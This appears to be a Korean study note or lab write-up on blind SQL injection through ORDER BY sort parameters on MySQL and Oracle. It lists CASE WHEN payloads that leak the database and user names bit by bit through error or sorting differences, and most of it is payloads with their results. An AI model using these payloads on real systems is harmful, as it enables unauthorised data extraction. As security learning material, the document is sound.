ORDER BY 구문에 대한 SQL Injection 공격

# MYSQL

Title 누르고 burp하면 sort_column, sort 파라미터 뜬다.

---

case when  구문은 order by 절에도 사용할 수 있다.

쿼리	결과
select * from tb_board order by (select case when 1=1 then 'a' else (select 'a' union select 'b')end) desc;	내림차순 정렬 ('a' 컬럼 없어서 의미없음)
select * from tb_board order by (select case when 1=2 then 'a' else (select 'a' union select 'b')end) desc;	다중 레코드 오류

---

Mysql : DB 이름
sort_column=(select case when ascii(substring((select database()),1,1))&1=1 then 'a' else (select 'a' union select 'b')end)&sort=desc	에러 발생 0	DB : b□□□□
sort_column=(select case when ascii(substring((select database()),1,1))&2=2 then 'a' else (select 'a' union select 'b')end)&sort=desc	게시판 내림차순 정렬 1
sort_column=(select case when ascii(substring((select database()),1,1))&4=4 then 'a' else (select 'a' union select 'b')end)&sort=desc	에러 발생 0
sort_column=(select case when ascii(substring((select database()),1,1))&8=8 then 'a' else (select 'a' union select 'b')end)&sort=desc	에러 발생 0
sort_column=(select case when ascii(substring((select database()),1,1))&16=16 then 'a' else (select 'a' union select 'b')end)&sort=desc	에러 발생 0
sort_column=(select case when ascii(substring((select database()),1,1))&32=32 then 'a' else (select 'a' union select 'b')end)&sort=desc	게시판 내림차순 정렬 1
sort_column=(select case when ascii(substring((select database()),1,1))&64=64 then 'a' else (select 'a' union select 'b')end)&sort=desc	게시판 내림차순 정렬 1
sort_column=(select case when ascii(substring((select database()),1,1))&128=128 then 'a' else (select 'a' union select 'b')end)&sort=desc	에러 발생 0
01100010 → 98 → 'b'
...생략
sort_column=(select case when ascii(substring((select database()),5,1))&128=128 then 'a' else (select 'a' union select 'b')end)&sort=desc		DB : board

---

# ORACLE

---

쿼리	결과
select * from TB_BOARD order by (select case when 1=1 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual) desc;	내림차순 정렬 ('a' 컬럼 없어서 의미없음)
select * from TB_BOARD order by (select case when 1=2 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual) desc;	Posts does not exist. (게시물 존재 x, mysql하고 다르게 오류 안뜨고 게시물이 안뜸)

---

ORACLE : user 이름
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),1)=1 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc	내림차순 정렬 1	DB : C□□□□□□□□□□□□□
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),2)=2 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc	내림차순 정렬 1
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),4)=4 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc	Posts does not exist. 0
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),8)=8  then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc	Posts does not exist. 0
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),16)=16 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc	Posts does not exist. 0
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),32)=32 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc	Posts does not exist. 0
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),64)=64 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc	내림차순 정렬 1
sort_column=(select case when BITAND(ascii(substr((select user from dual),1,1)),128)=128 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc	Posts does not exist. 0
01000011 → 67 → 'C'
...생략
sort_column=(select case when BITAND(ascii(substr((select user from dual),14,1)),128)=128 then 'a' else (select 'a' from dual union select 'b' from dual)end from dual)&sort=desc		DB : C##CREHACKTIVE